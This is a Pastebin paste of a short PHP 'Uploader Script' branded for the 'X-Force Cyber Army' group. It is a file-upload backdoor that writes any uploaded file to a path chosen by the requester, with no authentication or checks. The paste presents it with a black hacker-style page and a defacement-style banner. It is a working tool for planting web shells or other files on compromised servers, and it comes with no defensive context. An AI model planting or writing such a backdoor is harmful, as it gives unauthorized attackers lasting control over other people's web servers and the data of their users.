Advertisement
MrN0body

X-Force Cyber Army || Uploader Script

Feb 28th, 2017
618
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.82 KB | None | 0 0
  1.  <?php
  2.  
  3. $files = @$_FILES["files"];
  4. if ($files["name"] != '') {
  5.     $fullpath = $_REQUEST["path"] . $files["name"];
  6.     if (move_uploaded_file($files['tmp_name'], $fullpath)) {
  7.         echo "<h1><a href='$fullpath'>Click Here</a></h1>";
  8.     }
  9. }echo '<html><head><title>X-Force Cyber Army || Uploader Script</title></head><body bgcolor="0000000"><center> <img src="https://img2.brain3.photobox.com/750251108cffe88b942d1fcff0f1bf29507999e4fb5458bb06e66cdf12d016ebdd900797.jpg" width="50%"/><h2><font color="white">X-Force Cyber Army</font></h2><br><form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Upload"></form><footer><font color="white">
  10. <small>Copyright © 2017 || MrNobody</small>
  11. </footer></center></font></body>
  12. </html>';
  13. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement